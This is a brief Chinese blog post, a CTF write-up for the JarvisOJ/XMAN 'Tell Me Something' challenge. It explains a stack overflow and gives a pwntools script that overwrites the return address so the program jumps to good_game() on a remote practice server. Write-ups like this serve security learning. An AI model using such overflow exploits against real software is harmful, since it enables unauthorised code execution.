[JarvisOj][XMAN]lTell Me Something

除了NX。。估计还是栈溢出

 

 发现还是一样的read函数。

继续分析

于是只需要让他返回到good_game()的地址就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
 
 
 
sh = remote("pwn.jarvisoj.com",9876)
 
 
 
payload = '\x00'*0x88 + p64(0x0000000000400620)
 
 
 
sh.recvuntil("message:\n")
 
sh.sendline(payload)
 
print sh.recvline()
 
print sh.recvline()

 

posted @   轩x  阅读(304)  评论(0编辑  收藏  举报
努力加载评论中...
点击右上角即可分享
微信分享提示